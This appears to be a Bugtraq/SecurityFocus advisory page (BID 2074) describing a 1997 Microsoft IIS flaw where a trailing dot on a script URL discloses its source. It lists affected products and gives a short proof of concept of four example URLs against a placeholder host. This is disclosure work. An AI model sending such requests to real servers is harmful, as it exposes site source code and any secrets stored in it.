BID:2074

Microsoft IIS Appended Dot Script Source Disclosure Vulnerability

Info

Microsoft IIS Appended Dot Script Source Disclosure Vulnerability

Bugtraq ID:	2074
Class:	Design Error
CVE:
Remote:	Yes
Local:	Yes
Published:	Feb 20 1997 12:00AM
Updated:	Feb 20 1997 12:00AM
Credit:	Posted to BugTraq on February 20, 1997 by Mark Joseph Edwards < [email protected] >
Vulnerable:	Microsoft IIS 3.0 - Microsoft Windows NT 4.0 SP6a - Microsoft Windows NT 4.0 SP6a - Microsoft Windows NT 4.0 SP6 - Microsoft Windows NT 4.0 SP6 - Microsoft Windows NT 4.0 SP5 - Microsoft Windows NT 4.0 SP5 - Microsoft Windows NT 4.0 SP4 - Microsoft Windows NT 4.0 SP4 - Microsoft Windows NT 4.0 SP3 - Microsoft Windows NT 4.0 SP3 - Microsoft Windows NT 4.0 SP2 - Microsoft Windows NT 4.0 SP2 - Microsoft Windows NT 4.0 SP1 - Microsoft Windows NT 4.0 SP1 - Microsoft Windows NT 4.0 - Microsoft Windows NT 4.0 Microsoft IIS 2.0 + Microsoft Windows NT 4.0 + Microsoft Windows NT 4.0

Not Vulnerable:	Microsoft IIS 5.0 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server SP1 + Microsoft Windows 2000 Advanced Server + Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional SP1 + Microsoft Windows 2000 Professional + Microsoft Windows 2000 Professional - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server SP1 + Microsoft Windows 2000 Server + Microsoft Windows 2000 Server Microsoft IIS 4.0 + Cisco Building Broadband Service Manager (BBSM) 5.0 + Cisco Building Broadband Service Manager (BBSM) 5.0 + Cisco Call Manager 3.0 + Cisco Call Manager 3.0 + Cisco Call Manager 2.0 + Cisco Call Manager 2.0 + Cisco Call Manager 1.0 + Cisco Call Manager 1.0 + Cisco ICS 7750 + Cisco ICS 7750 + Cisco IP/VC 3540 Video Rate Matching Module + Cisco IP/VC 3540 Video Rate Matching Module + Cisco Unity Server 2.4 + Cisco Unity Server 2.4 + Cisco Unity Server 2.3 + Cisco Unity Server 2.3 + Cisco Unity Server 2.2 + Cisco Unity Server 2.2 + Cisco Unity Server 2.0 + Cisco Unity Server 2.0 + Cisco uOne 4.0 + Cisco uOne 4.0 + Cisco uOne 3.0 + Cisco uOne 3.0 + Cisco uOne 2.0 + Cisco uOne 2.0 + Cisco uOne 1.0 + Cisco uOne 1.0 + Hancom Hancom Office 2007 0 + Hancom Hancom Office 2007 0 + Microsoft BackOffice 4.5 + Microsoft BackOffice 4.5 + Microsoft Windows NT 4.0 Option Pack + Microsoft Windows NT 4.0 Option Pack

Exploit / POC

Microsoft IIS Appended Dot Script Source Disclosure Vulnerability

http://www.target.host/aspfile.asp.
http://www.target.host/scriptfile.ht.
http://www.target.host/scriptfile.id.
http://www.target.host/scriptfile.PL.

References

Microsoft IIS Appended Dot Script Source Disclosure Vulnerability

References:

Microsoft IIS 3.0 "%2e" ASP Source Disclosure Vulnerability (SecurityFocus)
Q163485: Active Server Pages Script Appears in Browser (Microsoft)
Q164059: IIS Execution File Text Can Be Viewed in Client (Microsoft)